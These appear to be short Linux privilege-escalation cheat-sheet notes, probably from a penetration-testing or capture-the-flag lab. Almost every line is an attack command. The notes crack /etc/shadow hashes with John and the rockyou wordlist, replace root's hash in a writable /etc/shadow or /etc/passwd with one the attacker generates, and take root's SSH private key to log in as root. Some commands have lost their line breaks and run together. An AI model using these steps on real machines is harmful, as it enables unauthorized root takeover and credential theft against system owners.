$6$ indicates that the hash was generate using sha512
Crack the hash
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Switch user
su
Writable /etc/shadow
Make a backup
cp /etc/shadow /home/user/
Local machine
Generate SHA512 hash
mkpasswd -m sha-512 newpassword
Victim machine
vim /etc/shadow#Replace the root user password hash with the new generate hash
Switch user
su
Writable /etc/shadow
On local machine
openssl passwd "password"
Victim machine
vim /etc/passwd
change the x in root user row with the password generated
su to switch.
## Altenatively you can copy paste the root user and append new root user at the end of the file with the password
SSH keys
Check if we can access id_rsa
Check if root login is allowed over ssh
grep PermitRootLogin /etc/ssh/sshd_config
Copy the key to the localmachine
vim root_keychmod 600 root_keyssh -i root_key user@Ip